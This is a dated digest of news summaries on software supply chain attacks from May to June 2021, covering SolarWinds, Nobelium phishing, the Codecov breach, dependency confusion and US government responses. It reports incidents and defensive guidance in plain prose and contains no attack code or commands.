Ref - ThreatPost
_______________________________________________________________________________________
(June 10, 2021)
Mitigating third-party risks with effective cyber risk management
When it comes to cybersecurity, all sides involved in a business have to hold up their end of the bargain. A customer organization has to understand that it retains responsibility for the data it shares with third parties and that the third parties that hold and use that data, are effectively an extension of the customer’s business.
_______________________________________________________________________________________
(June 10, 2021)
What SolarWinds taught enterprises about data protection
The SolarWinds breach has forced businesses worldwide to reconsider their approach to data protection and overall security. The event highlighted the level of potential devastation had the SolarWinds’ hackers chosen to encrypt the data and hold it for ransom. A recent report found the number of ransomware attacks grew by more than 150% in 2020, as cybercriminals took advantage of work-from-home vulnerabilities.
_______________________________________________________________________________________
(June 9, 2021)
Hardening the physical security supply chain to mitigate the cyber-risk
A recent report by Genetec found that 67% of physical security professionals, including Genetec's end users, integrators, and partners, are planning to prioritize their cybersecurity strategy in 2021. IP security cameras and other security devices are by their very nature connected to the internet. When not secured properly, any camera or access control device in the so-called IoT can be accessed remotely by just about anyone.
Ref - DarkReading
_______________________________________________________________________________________
(June 9, 2021)
How to stop SolarWinds-like hacks
Researchers from Ohio State University and Potomac Research LLC, led by Noeloikeau Charlot, published a paper on the idea of using “physically unclonable functions (PUFs).” At a microscopic level, even mass-produced computer chips have tiny differences from one chip to the next. For example, an online bank can check a device’s PUF to make sure that only someone with the right device is accessing a bank account. This can help detect the attacks involving bypass two-factor authentication, which SolarWinds attackers exploited.
_______________________________________________________________________________________
(June 9, 2021)
Stealthy Gelsemium cyberspies linked to NoxPlayer supply-chain attack
ESET researchers have linked a stealthy cyberespionage group known as Gelsemium to the NoxPlayer Android emulator supply-chain attack that targeted gamers earlier this year. According to reports from G DATA and Verint Systems, the cyberspies used spear-phishing emails with document attachments exploiting the CVE-2012-0158 Microsoft Office vulnerability to deliver the malware.
_______________________________________________________________________________________
(June 8, 2021)
Protecting Industrial Control Systems against cyberattacks
ICS infrastructures are challenged to confirm the security of the supply chain for the OT system devices and sensors they rely on. There is no requirement to comply with the ISO 27001-2013 standard, which means ICS operators must often verify the security of their suppliers themselves. For multiple reasons, supply chains cannot be assumed to be a trusted method of software deliveries.
_______________________________________________________________________________________
(June 8, 2021)
The next phase of software supply chain security
The recent executive order by President Joe Biden does several important things related to software supply chain security. It requires the NIST to develop baseline security standards for software used by government agencies. Those standards are required to encompass secure software development environments, including such actions as using administratively separate build environments; auditing trust relationships.
_______________________________________________________________________________________
(June 8, 2021)
The rise and rise of supply chain attacks
There are some driving forces behind the rising popularity of supply chain attacks. The cyber defenses of many high-value targets are in much better shape than before. Direct attacks against target systems may take a lot of effort and yield few results. Hence, it is more effective for cybercriminals to move up the software supply chain to exploit weak links outside their target’s cyber defenses.
Ref - Computer Weekly
_______________________________________________________________________________________
(June 8, 2021)
Supply chain security awareness - Key risk factors
As the SolarWinds breach was underway, global supply chains elsewhere were pelted with an ongoing barrage of volatility: the COVID-19 pandemic dramatically shifted demand while pushing employees out of traditional office infrastructures and into their homes, growing trade conflicts rendered supply chain hardware and software at risk of weaponization, and significant changes in industrial regulation heaped expensive penalties and restrictions on already-stressed businesses.
_______________________________________________________________________________________
(June 7, 2021)
Defending against Software supply chain attacks: Recommendations from NIST
Given the sparsity of rapid mitigation options in the event of a software supply chain attack (because the victim organization doesn’t have the authority to command a timely response from their software vendor), it’s far more beneficial to invest in preventive measures. Experts recommend using a risk management lens when purchasing software and ask prospective vendors for compliance verifications.
_______________________________________________________________________________________
(June 6, 2021)
Why are supply chain attacks scary?
Supply chain attacks are scary because they're really hard to deal with, and because they make it clear you're trusting a whole ecology. You're trusting every vendor whose code is on your machine, and you're trusting every vendor's vendor. The rise in supply chain attacks, Berkeley's Weaver argues, may be due in part to improved defenses against more rudimentary assaults.
Ref - Ars Technica
_______________________________________________________________________________________
(June 5, 2021)
CEO of Mandiant talks about SolarWinds hack
Kevin Mandia, CEO of Mandiant, pointed out in an interview at the WSJ Cybersecurity about the ongoing attempt to define what is and is not considered cyberwar and grounds for retaliation by the US government. He commented that “apparently supply chain attacks are fair game.”
_______________________________________________________________________________________
(June 4, 2021)
Strengthening US cybersecurity: Impacts of the Executive Order
Even though the specifics of the executive order are not available today, compliance officers can start to anticipate the changes the business will need to make. First, they can expect to perform a fresh assessment of compliance risks under these new cybersecurity requirements. Second, they need to consider the new policies and procedures your business might need to implement.
_______________________________________________________________________________________
(June 4, 2021)
As cyberattacks surge, Biden seeks to mount a better defense
As the cyber breaches pile up, cyber experts say it's important to note the country is facing two distinct threats. On one side is the SolarWinds attack, which was primarily an intelligence-gathering operation carried out by Russia's foreign intelligence service, the SVR, which was quietly stealing U.S. government secrets for months. On the other side is ransomware, which is surging. Russian criminal gangs are blamed for both the Colonial Pipeline attack and the hack that briefly shut down the world's largest meat supplier, JBS.
Ref - NPR
_______________________________________________________________________________________
(June 3, 2021)
Dependency confusion: Compromising the supply chain
Researchers demonstrated that if a bad actor registers the private names on public package repositories and upload public libraries that contain malicious code, the code could be pushed from internal applications and results in data exfiltration or remote code execution. The researcher details how he successfully exploited this vector to infiltrate code and secure large bug bounties from Apple, Shopify, Microsoft, and PayPal among others.
_______________________________________________________________________________________
(June 3, 2021)
Organizations are still wondering about Dependency Confusion attacks
In early February of 2021, a vulnerability was revealed in the npm repository, infiltrating major technology companies, including Microsoft, Tesla, and Netflix. Although 35 companies were named, the issue affected many more, with hundreds of similar copycat efforts appearing on the npm repository. While routing rules can manage some of the issues around this for internal repositories, these require manual adjustment and quickly go out of date, so automation is necessary to keep on top of this issue.
_______________________________________________________________________________________
(June 3, 2021)
Challenges with protecting the Supply Chain
With regards to protecting the supply chain, first businesses should take the steps to identify key assets, identify partners, and what access these partners have to the key assets. Industry frameworks like NIST, OWASP, CISSP Controls, etc, all stipulate the understanding of where critical assets are, be it hardware, software, endpoints, or applications. However, compiling these lists is a struggle for most.
_______________________________________________________________________________________
(June 3, 2021)
Japanese government agencies suffered supply chain attack exposing proprietary data
Several Japanese government agencies reportedly suffered data breaches originating from Fujitsu’s “ProjectWEB” information sharing tool. Fujitsu had earlier disclosed that hackers gained unauthorized access to the system and stole customer data. Investigators said that the cyber attack affected the Japanese Ministry of Land, Infrastructure, Transport, Tourism, the Cabinet Secretariat, and the Narita International Airport.
_______________________________________________________________________________________
(June 2, 2021)
Proactive security key to combating supply chain attacks
Threat actors are becoming more sophisticated and are constantly evolving their capabilities to remain effective in their operations. To this end, organizations need to invest in the people, processes, and technology they deploy across their network in order to stand the best chance of preventing an attack. This will result in the development of capabilities and processes that will help to remediate any attacks as efficiently as possible, reducing the potential impact to both the organization and its customers.
_______________________________________________________________________________________
(June 1, 2021)
NobleBaron poisoned installers could be used in supply chain attacks
The latest wave of attacks being attributed to APT29/Nobelium threat actors includes a custom downloader that is part of a “poisoned update installer” for electronic keys used by the Ukrainian government. The latest iteration of malware activity linked to Nobelium uses a convoluted multi-stage infection chain that runs five to six layers deep. This includes the use of ‘DLL_stageless’ downloaders, called NativeZone.
_______________________________________________________________________________________
(June 1, 2021)
SolarWinds attack was an attack on trust
The SolarWinds hack last year offered some valuable insights into the true cost of a cyberattack, said Charl van der Walt, head of security research at Orange Cyberdefense, delivering one of the opening keynote addresses at the ITWeb Security Summit 2021. The impact is an attack on trust, and the consequence of this is fear, uncertainty, and doubt, which can be expensive and highly damaging.
_______________________________________________________________________________________
(June 1, 2021)
The U.S. seizes domains used by SolarWinds hackers
The U.S. Department of Justice (DoJ) disclosed that it intervened to take control of two command-and-control (C2) and malware distribution domains used in the recent attack campaign. The court-authorized domain seizure took place on May 28, the DoJ said, adding the action was aimed at disrupting the threat actors' follow-on exploitation of victims as well as block their ability to compromise new systems.
_______________________________________________________________________________________
(June 1, 2021)
Defining linchpins: An industry perspective on remediating Sunburst
The Atlantic Council’s latest report “Broken Trust: Lessons from Sunburst” introduces the concept of “linchpins,” which it defines as widely used software with significant permissions ... on which every other security program or critical resource depends, and which were a key factor in the Sunburst event. The report identifies challenges to identifying, securing, and triaging this linchpin software.
_______________________________________________________________________________________
(May 31, 2021)
CISA-FBI Alert: 350 organizations targeted in attack abusing email marketing service
According to the FBI and CISA, the attackers actually sent spear-phishing emails to over 7,000 accounts at 350 organizations, including government, non-governmental and intergovernmental organizations. The initial estimates said that the attack had targeted roughly 3,000 accounts across more than 150 organizations.
_______________________________________________________________________________________
(May 31, 2021)
Why are supply chain attacks so dangerous?
By compromising a single supplier, spies or saboteurs can hijack its distribution systems to turn any application they sell, any software update they push out, even the physical equipment they ship to customers, into Trojan horses. With one well-placed intrusion, they can create a springboard to the networks of a supplier's customers—sometimes numbering hundreds or even thousands of victims.
Ref - Wired
_______________________________________________________________________________________
(May 31, 2021)
SolarWinds and Colonial Pipeline crisis showed 7 ways to respond to cyberattacks
The federal government and other agencies have demonstrated several crisis management best practices in response to the recent cyberattacks against SolarWinds and Colonial Pipeline. Business leaders should keep these best practices in mind when they have to deal with cyberattacks—and other crisis situations—at their companies and organizations.
Ref - Forbes
_______________________________________________________________________________________
(May 30, 2021)
Defending and deterring the Nobelium attacks
Microsoft provided several recommendations for protection against attacks like SolarWinds. The first step is to opt for better defense. The best defense, according to Microsoft, is to move to the cloud, where the most secure technology from any cloud provider is always up to date, and where the fastest security innovations are occurring. The second step is to deter damaging attacks. Clearer rules for nation-state conduct need to be defined and agreed to by the international community.
_______________________________________________________________________________________
(May 29, 2021)
Biden budget sets aside $750 million for SolarWinds response
U.S. President Joe Biden's proposed budget includes $750 million for the government agencies hit by the SolarWinds hack to pay for cybersecurity improvements to prevent another attack. The money comes on top of a $500 million fund for federal cybersecurity as the U.S. government recovers from the cyberattack that hit nine agencies including the State Department and Treasury.
Ref - Yahoo
_______________________________________________________________________________________
(May 28, 2021)
Breaking down Nobelium’s latest early-stage toolset
Each of the NOBELIUM tools is designed for flexibility, enabling the actor to adapt to operational challenges over time. Microsoft Threat Intelligence Center (MSTIC) has released an appendix of indicators of compromise (IOCs) for the community to better investigate and understand NOBELIUM’s most recent operations.
_______________________________________________________________________________________
(May 28, 2021)
Sophisticated spear-phishing campaign targets Government organizations, IGOs, and NGOs
CISA and FBI acknowledge open-source reporting attributing the activity discussed in the report to APT29 (also known as Nobelium, The Dukes, and Cozy Bear). However, CISA and FBI are investigating this activity and have not attributed it to any threat actor at this time. CISA and FBI urge governmental and international affairs organizations and individuals to adopt a heightened state of awareness and implement the recommendations specified in its advisory.
_______________________________________________________________________________________
(May 28, 2021)
The key lesson from the SolarWinds hack is visibility
The SolarWinds attack has laid bare the interconnectedness of IT infrastructure: if most of the government and business infrastructure uses overlapping software packages, they are clearly not as separate from one another as they would like to think. Vulnerabilities could be anywhere throughout the supply chain. Why would hackers attack a single end-user when they can backdoor their way into all of them at once via a single service platform?
_______________________________________________________________________________________
(May 28, 2021)
How Nobelium leveraged Constant Contact in the Phishing campaign
The May 25 phishing campaign included several iterations of emails sent from the Constant Contact account of USAID. In one example, the emails appear to originate from USAID. The emails posed as an “alert” from USAID dated May 25, 2021. If the user clicked the link on the email, the URL directs them to the legitimate Constant Contact service and then redirects to a Nobelium “controlled infrastructure.” A “malicious ISO” file was then delivered to the system.
Ref - CRN
_______________________________________________________________________________________
(May 28, 2021)
Almost 3,000 emails targeted by Nobelium attack
The threat actor behind last year’s major SolarWinds hack has led a new targeted campaign spanning nearly 3,000 emails. According to reports, hackers accessed the Constant Contact account of USAID, the service used for email marketing. From there, Nobelium distributed phishing emails that, when clicked, inserted a malicious file used to distribute a backdoor called NativeZone.
_______________________________________________________________________________________
(May 28, 2021)
The group behind SolarWinds hack now targeting government agencies, NGOs - Microsoft
The group behind the SolarWinds cyberattack is now targeting government agencies, think tanks, consultants, and non-governmental organizations, Microsoft Corp said late on Thursday. While organizations in the United States received the largest share of attacks, targeted victims came from at least 24 countries, Microsoft said.
_______________________________________________________________________________________
(May 28, 2021)
Russia appears to carry out a hack through the system used by the U.S. Aid Agency
By breaching the systems of a supplier used by the federal government, the hackers sent out emails as recently as this week from more than 3,000 genuine-looking accounts. The email was implanted with code that would give the hackers unlimited access to the computer systems of the recipients, from stealing data to infecting other computers on a network.
Ref - The New York Times
_______________________________________________________________________________________
(May 27, 2021)
Another Nobelium Cyberattack
Microsoft has observed cyberattacks by the threat actor Nobelium targeting government agencies, think tanks, consultants, and non-governmental organizations. This wave of attacks targeted approximately 3,000 email accounts at more than 150 different organizations. By piggybacking on software updates and now mass email providers, Nobelium increases the chances of collateral damage in espionage operations and undermines trust in the technology ecosystem.
_______________________________________________________________________________________
(May 27, 2021)
Attack on Fujitsu’s ProjectWEB SaaS platform may be the next big supply chain attack
While still early, some researchers view the reported hacking into Fujitsu’s ProjectWEB software-as-a-service (SaaS) platform as a nation-state attack, not unlike the one that targeted the SolarWinds supply chain. Impacted agencies include the Ministry of Land, Infrastructure, Transport, and Tourism; the Ministry of Foreign Affairs; the Cabinet Secretariat; and Narita Airport in Tokyo.
_______________________________________________________________________________________
(May 27, 2021)
Canada Post falls victim to a third-party hack
Canada Post is the latest victim of a supply chain attack that allowed hackers to capture the names and addresses of almost one million senders and receivers of packages over a three-year period. This was the result of a cyberattack on its electronic data interchange (EDI) solution supplier, Commport Communications, which manages the shipping manifest data of large parcel business customers.
_______________________________________________________________________________________
(May 26, 2021)
The EU’s response to SolarWinds
Unofficial reports indicate that a number of EU member states are toying with the idea of introducing sanctions against Russian citizens who were allegedly involved in the SolarWinds campaign. Also, given the steady deterioration of EU-Russia relations in recent months, member states could be tempted to demonstrate their collective determination to push back against Russia and their commitment to the transatlantic alliance.
_______________________________________________________________________________________
(May 26, 2021)
Newly discovered bugs in VSCode extensions could lead to supply chain attacks
Severe security flaws uncovered in popular Visual Studio Code extensions could enable attackers to compromise local machines as well as build and deployment systems through a developer's integrated development environment (IDE). The vulnerable extensions could be exploited to run arbitrary code on a developer's system remotely, in what could ultimately pave the way for supply chain attacks.
Ref - The Hacker News
_______________________________________________________________________________________
(May 26, 2021)
How SolarWinds changed cybersecurity leadership's priorities
The recent Scale survey showed that in wake of SolarWinds attacks, security leaders are retooling their security operations in response to the changing threat environment. For instance, 36% said that they expected third-party risks to rise over the next 12 months. Around 47% said third-party risks are a top factor affecting the C-suite's understanding of the business impact of security, behind data breaches at 57% and remote work at 54%.
_______________________________________________________________________________________
(May 26, 2021)
Federal Agencies struggling with supply chain security
More than five months after the SolarWinds supply chain attack came to light, federal agencies continue to struggle with supply chain security, according to a Government Accountability Office official. In the absence of foundational risk management practices, malicious actors may continue to exploit vulnerabilities in the ICT supply chain, causing further disruption to mission operations, harm to individuals, or theft of intellectual property.
_______________________________________________________________________________________
(May 25, 2021)
Supply chain attacks: How to reduce open-source vulnerabilities
Organizations are increasingly turning to adversary simulation engagements to reduce the impact of supply chain attacks. In these tests, a ‘red’ team uses the same tactics, techniques, and procedures that threat actors employ. The ‘blue’ team responds to the attacks from the red team. They’ll gain valuable knowledge by combating the same tools threat actors are currently using.
_______________________________________________________________________________________
(May 25, 2021)
How to avoid web supply chain attacks
The simplest thing that you may expect for secure interaction with your suppliers is that your contractors should present you with a web vulnerability scanner compliance report, such as the OWASP Top-10 report offered by Acunetix. This type of report will immediately show you if the software that you are purchasing has any vulnerabilities and if these are the types of vulnerabilities that you should worry about.
_______________________________________________________________________________________
(May 25, 2021)
Three-quarters of CISOs predict another SolarWinds-style attack
Some 84% of global organizations have suffered a serious security incident over the past two years and a majority are expecting another SolarWinds-style supply chain attack, according to a new Splunk report.
_______________________________________________________________________________________
(May 25, 2021)
Tailor security training to developers to tackle software supply chain risks
A lack of cohesion between software development teams and cybersecurity functions compounds the software supply chain risks faced by organizations, making it all the more urgent for cybersecurity leaders and their teams to better engage with and educate developers. The training must be tailored to address the specific cyber risks surrounding the software development lifecycle.
_______________________________________________________________________________________
(May 24, 2021)
Recent cyberattacks signal alarm for better supply chain security
There are three important lessons from the fallout of recent major cyber incidents, including SolarWinds attacks. Any organization leveraging third-party software must not take its convenience and claims of being secure at face value but pay attention to the integrity of the services they use. There must be a focus on container security. Before integrating a third-party service, organizations need to ensure that these vendors’ security standards are up-to-par.
Ref - CPO Magazine
_______________________________________________________________________________________
(May 24, 2021)
SolarWinds, Exchange attacks revive calls for mandatory breach notification
On the heels of three major cybersecurity incidents over the past six months—the SolarWinds and Microsoft Exchange supply chain attacks and the Colonial Pipeline ransomware attack—government officials and some in the private sector are reviving calls for better information sharing and national breach notification requirements.
_______________________________________________________________________________________
(May 21, 2021)
E-commerce giant Mercari suffers major data breach in Codecov incident
E-commerce platform Mercari has disclosed a major data breach incident that occurred due to exposure from the Codecov supply-chain attack. The company has confirmed that tens of thousands of customer records, including financial information, were exposed to external actors due to the Codecov breach.
Ref - Bleeping Computer
_______________________________________________________________________________________
(May 21, 2021)
Department of Veterans Affairs not a victim of SolarWinds hack
The Department of Veterans Affairs (VA) was not a victim of the sweeping SolarWinds hacking campaign, the department’s top cyber official told lawmakers. Paul Cunningham, chief information security officer of VA, said there was no evidence of compromise across its wide-ranging and complex networks. He told lawmakers this finding was reaffirmed in separate investigations by the CISA and the intelligence community.
Ref - Fed Scoop
_______________________________________________________________________________________
(May 20, 2021)
12 lessons learned from the SolarWinds breach
CRN spoke with 12 prominent C-suite executives at RSA Conference 2021 about the biggest lessons learned from one of the most infamous cyberattacks of all time. They compiled 12 major takeaways from the SolarWinds breach, from applying far greater scrutiny to technology suppliers and code used during the application development process to eliminating the use of on-premise Microsoft Active Directory.
_______________________________________________________________________________________
(May 20, 2021)
SolarWinds attack dates back to at least January 2019
Hackers were present in SolarWinds' systems as early as January 2019, months earlier than previously reported, SolarWinds President and CEO Sudhakar Ramakrishna revealed during an appearance at the 2021 RSA Conference (RSAC). The entry point was the SolarWinds Orion software. Attackers compromised the SolarWinds system for distributing software updates and used that to spread malware to its customers.
_______________________________________________________________________________________
(May 19, 2021)
SentinelOne: More supply chain attacks are coming
Large-scale supply chain attacks are here to stay, according to Marco Figueroa, the principal threat researcher at SentinelOne. During an RSA Conference 2021 session, Figueroa dissected Sunburst, the malware used to compromise SolarWinds' Orion platform that led to an extensive supply chain attack on dozens of organizations.
_______________________________________________________________________________________
(May 19, 2021)
SolarWinds CEO provides new details into attack and response
New details into the notorious SolarWinds nation-state attack and its fallout were provided by Sudhakar Ramakrishna, CEO of SolarWinds, during a keynote session on Day 3 of the virtual RSA Conference 2021. This included the revelation that the attackers may have accessed the system as early as January 2019 and an expression of remorse for comments made during his congressional appearance about the attack in February 2021.
_______________________________________________________________________________________
(May 19, 2021)
monday.com source code has been accessed by Codecov threat actors
monday.com has revealed it had suffered a Codecov supply-chain attack that recently impacted several organizations. During the cyberattack, threat actors accessed a read-only copy of its source code. The cyberattack occurred around January 31 2021 when cybercriminals obtained private access to hundreds of networks belonging to Codecov’s users.
_______________________________________________________________________________________
(May 19, 2021)
How CISA limited the impact of the SolarWinds attack
Soon after the specifics about the SolarWinds attack came to light, the DHS went to work to limit the damage. Among the first things it did was put the attack signatures into the EINSTEIN toolset that is used by nearly every agency. EINSTEIN was extremely useful in terms of identifying suspicious network traffic from a handful of federal civilian agencies that upon further investigation by those agencies helped identify additional victims of this campaign.
_______________________________________________________________________________________
(May 19, 2021)
Pentagon’s CMMC compliance may block a SolarWinds-style attack
The Pentagon’s Cybersecurity Maturity Model Certification (CMMC) program is designed to be one key line of defense. The program sets out five maturity models applicable to defense industrial base contractors based on the level of sensitivity of information stored in their systems. Under the program, obtaining a certification of compliance at the appropriate risk level is an allowable cost. However, the extent to which contractors may have to dig into their own pockets to obtain certification is a running concern.
_______________________________________________________________________________________
(May 19, 2021)
SolarWinds CEO apologizes for blaming an intern
Sudhakar Ramakrishna, the former CEO of Pulse Secure who took the top job at SolarWinds, apologized for the way the company blamed an intern for using a weak password - solarwinds123 - during early testimony before congress. When asked about the password, former SolarWinds CEO Kevin Thompson said the password was a mistake that an intern made. Ramakrishna also told lawmakers that the password was from an intern’s Github account.
_______________________________________________________________________________________
(May 19, 2021)
SolarWinds - a harbinger for a national data breach reporting law
As the SolarWinds attack exemplified, the conversation around federal data breach reporting legislation is becoming increasingly relevant. FireEye’s public disclosure of the SolarWinds attack exemplified the benefits of proactive partnerships between the government and private sector, which have been strengthened over the years by routine information sharing and other initiatives.
_______________________________________________________________________________________
(May 18, 2021)
Government eyes new rules to tighten security against supply chain attacks
The Department for Digital, Culture, Media, and Sport (DCMS) has put out a call for views on the new rules, which may require IT service providers and managed services providers (MSPs) to undergo the same cybersecurity assessments that critical national infrastructure providers do.
_______________________________________________________________________________________
(May 18, 2021)
Russian denial regarding SolarWinds hack is 'unconvincing'
Russia's denial of involvement in the SolarWinds hack is "unconvincing", the former head of GCHQ's National Cyber Security Centre has said. And Prof Ciaran Martin said there was evidence the tactics, techniques, and tools used by the hackers matched many years of SVR activity.
_______________________________________________________________________________________
(May 18, 2021)
Russian spy chief denies SolarWinds attack
Russia's spy chief denied responsibility for the SolarWinds cyber attack but said he was "flattered" by the accusations from the U.S. and Britain that Russian foreign intelligence was behind such a sophisticated hack. Naryshkin said he did not want to accuse the U.S. of being behind the attack but quoted from documents leaked by former NSA contractor Edward Snowden to suggest that the tactics of the attack were similar to those used by U.S. and British intelligence agencies.
_______________________________________________________________________________________
(May 17, 2021)
Disconnect Internet for 3-5 days to evict SolarWinds hackers from the network
The newly published analysis report, AR21-134A, details resource-intensive and highly complex steps that will require disconnecting the enterprise network from the internet for three to five days. It is tailored for federal agencies that used affected versions of SolarWinds Orion and which discovered adversary activity within their environments (Category 3 agencies).
_______________________________________________________________________________________
(May 16, 2021)
SolarWinds breach exposes hybrid multi-cloud security weaknesses
Exposing severe security weaknesses in hybrid cloud, authentication, and least privileged access configurations, the high-profile SolarWinds breach laid bare just how vulnerable every business is. Enterprise leaders must see beyond the much-hyped baseline levels of identity and access management (IAM) and privileged access management (PAM) now offered by cloud providers.
_______________________________________________________________________________________
(May 14, 2021)
Supplemental direction (v4) on the implementation of CISA Emergency Directive (ED) 21-01
Agencies that have or had networks that used affected versions of SolarWinds Orion and have evidence of follow-on threat actor activity, such as binary beaconing to avsvmcloud[.]com and secondary C2 activity to a separate domain or IP address, including networks hosted by third parties on behalf of federal agencies, must comply with the applicable requirements for each network meeting respective conditions.
Ref - DHS
_______________________________________________________________________________________
(May 14, 2021)
Guidance for networks affected by the SolarWinds and Active Directory/M365 Compromise
Remediation plans for dealing with malicious compromises are necessarily unique to every organization, and success requires careful consideration. There are three phases for evicting the actor: Pre-Eviction (actions to detect and identify APT activity and prepare the network for eviction); Eviction (actions to remove the APT actor from on-premises and cloud environments); and Post-Eviction (actions to ensure eviction was successful and the network has good cyber posture).
_______________________________________________________________________________________
(May 14, 2021)
Effective tactics to prevent supply chain attacks
Upguard recommends several strategies to have the highest chances of preventing supply chain attacks. This includes implementing Honeytokens, having a secure Privileged Access Management, and implementing a Zero Trust Architecture. In addition, it recommends identifying all potential insider threats, protecting vulnerable resources, and minimizing access to sensitive data.
_______________________________________________________________________________________
(May 14, 2021)
Rapid7 source code, alert data accessed in Codecov supply chain attack
Rapid7 has disclosed the compromise of customer data and partial source code due to the Codecov supply chain attack. The cybersecurity firm said it was one of the victims of the incident, in which an attacker obtained access to the Codecov Bash uploader script.
Ref - ZDNet
_______________________________________________________________________________________
(May 13, 2021)
Addressing SolarWinds through executive action
The Executive Order (EO) on cybersecurity is a much-needed step toward shoring up the nation’s cyber posture. On the heels of last week’s damaging ransomware attack on Colonial Pipeline, this EO is a necessary step forward. While the EO will not solve all of the security problems or prevent the next SolarWinds attack – and the truth is no single policy, government initiative, or technology will – it is a great start.
_______________________________________________________________________________________
(May 13, 2021)
Third-party software may leave you vulnerable to cyberattacks
Leaders need new ways to reduce supply chain cybersecurity risks, whether they’re buying digital products and or producing them. The data showed that managers often fall prey to counterproductive and possibly dangerous mindsets that get in the way of securing supply chains and leave their companies exposed — and that they’re often taking cues from the top.
_______________________________________________________________________________________
(May 13, 2021)
Some implicitly trusted infrastructure areas can lead to supply chain compromises
Supply chains are vast, and this is by no means a comprehensive list of potential problems. A threat modeling exercise within the organization can give a more robust view of vulnerable infrastructure that is often overlooked. Users should take a concentrated look at the implicit trust relationships that they have with vendors and open-source software used in their build or manufacturing process and they will likely find many areas where trust supersedes security.
_______________________________________________________________________________________
(May 12, 2021)
How Biden’s new executive order plans to prevent another SolarWinds attack
The Biden administration has been drafting the order over the last few months and is designed less to address an incident like the one experienced by Colonial Pipeline, a privately-owned critical infrastructure operator that is believed to have been hit by a criminal gang than it is aimed at preventing a future SolarWinds-like incident.
Ref - The Record
_______________________________________________________________________________________
(May 12, 2021)
Senate hearing raises questions about SolarWinds backdoors
The U.S. Department of Commerce's CISO said during a Senate committee hearing Tuesday that his agency was one of the first to identify a SolarWinds-related compromise, raising questions about when the U.S. government initially detected the supply chain attacks.
Ref - TechTarget
_______________________________________________________________________________________
(May 12, 2021)
Supply chain penetration: Here’s how to protect from them
Effective protection of the supply chain means the adoption of a different mindset, one that assumes a breach will happen at some point. Because the supply chain represents a critical attack vector, an attack in this area could be a critical one, so cyber measures must be stepped up accordingly. Securing access to sensitive data and systems means organizations can reduce the risks significantly, thereby making it more difficult for attackers to achieve their end goals.
_______________________________________________________________________________________
(May 11, 2021)
Senators discuss federal cybersecurity following SolarWinds hack
Government officials say the 2020 SolarWinds cyber hack by the Russian government should have been a wake-up call. The U.S. is instead dealing with another cyber attack, this time on the largest fuel pipeline in the country. The SolarWinds and Pulse Secure VPN attacks targeted federal agencies and yet it was private sector companies that discovered them.
_______________________________________________________________________________________
(May 11, 2021)
Key challenges with modern AppSec and supply chain attacks
The OWASP API project has enumerated 10 critical API level threats that are substantially more important in the era of modern, cloud-native applications. The three key trends – microservice proliferation, application change, and porous perimeters – create an environment where attacks can flourish and where IT and security teams need to consider revisiting their application security practices and controls.
_______________________________________________________________________________________
(May 11, 2021)
SolarWinds CEO calls for collective action against state attacks
SolarWinds CEO Sudhakar Ramakrishna has revealed he is talking with his peers in the industry to form a consortium of like-minded, mid-market firms that could take collective action to defend themselves against nation state-backed malicious actors, such as Russia’s APT29, or Cozy Bear. Ramakrishna called for the industry to adopt a model of mutual responsibility and mutual accountability among smaller firms, noting that size alone is not an indicator of a company’s ability to protect itself from cyber attacks.
_______________________________________________________________________________________
(May 10, 2021)
Twilio, HashiCorp among Codecov supply chain hack victims
The stealth software supply chain compromise of the Codecov Bash Uploader went undetected since January. The first company to publicly acknowledge exposure was HashiCorp when a post-breach investigation found a subset of its CI pipelines used the affected Codecov component. Following HashiCorp’s statement, San Francisco-based Twilio issued an advisory to confirm it used the compromised Bash Uploader component in a small number of projects and CI pipelines.
_______________________________________________________________________________________
(May 10, 2021)
All you need to know about supply chain attacks and cloud-native
There are several characteristics of cloud-native application development environments that make them a lucrative target for attackers looking to embed malicious code into the supply chain. Cloud-native application development is characterized by the widespread use of open source components, often obtained from public registries. Additionally, container images, functions, and packages are updated frequently using CI/CD pipelines, creating multiple opportunities for attackers to embed themselves into the process.
_______________________________________________________________________________________
(May 10, 2021)
Cisco Threat Explainer: Supply Chain Attacks
There is a general pattern in supply chain attacks. First, the bad actors gather what information they can find about the primary target. Next, the bad actors attempt to compromise the secondary target. Once in, the attackers move laterally, their objective often being to compromise the secondary target’s software build system, where the source code for their software is stored, updated, and compiled.
_______________________________________________________________________________________
(May 10, 2021)
NIST and CISA release guidelines for defense against software supply chain attacks
The CISA and the NIST have released new guidelines on defending against various software supply chain risks. The agencies listed update hijacking, tampering with code signing, and the compromise of open-source code as the popular methods used by hackers to compromise software. Threat actors hijack update channels, like in the Russian NotPetya attack on Ukraine via tax accounting software. The SolarWinds Orion software supply chain attack employed similar tactics.
_______________________________________________________________________________________
(May 10, 2021)
Ransomware attack on CaptureRx exposes multiple providers across the U.S.
Multiple healthcare providers across the United States are reporting being impacted by a ransomware attack on CaptureRx, a San Antonio-based company providing drug-related administrative services. The CaptureRx attack highlights the impact of the software supply chain, and Faxton St. Luke’s Healthcare in New York, Randolph, VT-based Gifford Health Care, and Thrifty Drug Stores are just a few of the victims.
_______________________________________________________________________________________
(May 10, 2021)
The Colonial Pipeline ransomware attack and the SolarWinds hack were all but inevitable
Software supply chains and private sector infrastructure companies are vulnerable to hackers. Many U.S. companies outsource software development because of a talent shortage, and some of that outsourcing goes to companies in Eastern Europe that are vulnerable to Russian operatives.
_______________________________________________________________________________________
(May 10, 2021)
SolarWinds shares more information on cyberattack impact, initial access vector
Texas-based IT management company SolarWinds shared more information on the impact of the significant breach disclosed late last year, and claimed that less than 100 of its customers were actually hacked. The company said the attacker only targeted its build system for the Orion product, but did not actually modify any source code repository, and the SUNBURST malware has not been found in any other product.
_______________________________________________________________________________________
(May 8, 2021)
Best practices to reduce supply chain cyber exposure
Cyber-attacks against the supply chain continue to grow — and some are simply impossible to eliminate. With that in mind, consider an approach rooted in cyber risk management. Whereas a traditional cybersecurity approach focuses primarily on mitigation, cyber risk management understands that not all risks can be removed and not all attacks can be prevented, especially when it comes to the supply chain.
Ref - Marsh
_______________________________________________________________________________________
(May 8, 2021)
SolarWinds says Russian Group likely took data during the cyberattack
While SolarWinds doesn’t know how the Russia-backed group broke into its networks, the company believes the hackers may have used an unknown vulnerability, a brute-force cyber attack, or through social engineering -- such as a phishing operation. The hackers then conducted “research and surveillance” on the company, including its Microsoft Office 365 environment, for at least nine months prior to October 2019, when they moved to the “test run” phase of the attack.
_______________________________________________________________________________________
(May 8, 2021)
SolarWinds says Russian group likely took data during cyber-attack
The Russia-linked hackers that compromised popular software by the Texas-based firm SolarWinds last year broke into email accounts and likely took data from the firm. SolarWinds said it found evidence that causes us to believe the threat actor exfiltrated certain information as part of its research and surveillance.
_______________________________________________________________________________________
(May 7, 2021)
Hackers accessed SolarWinds’ Office 365 since early 2019
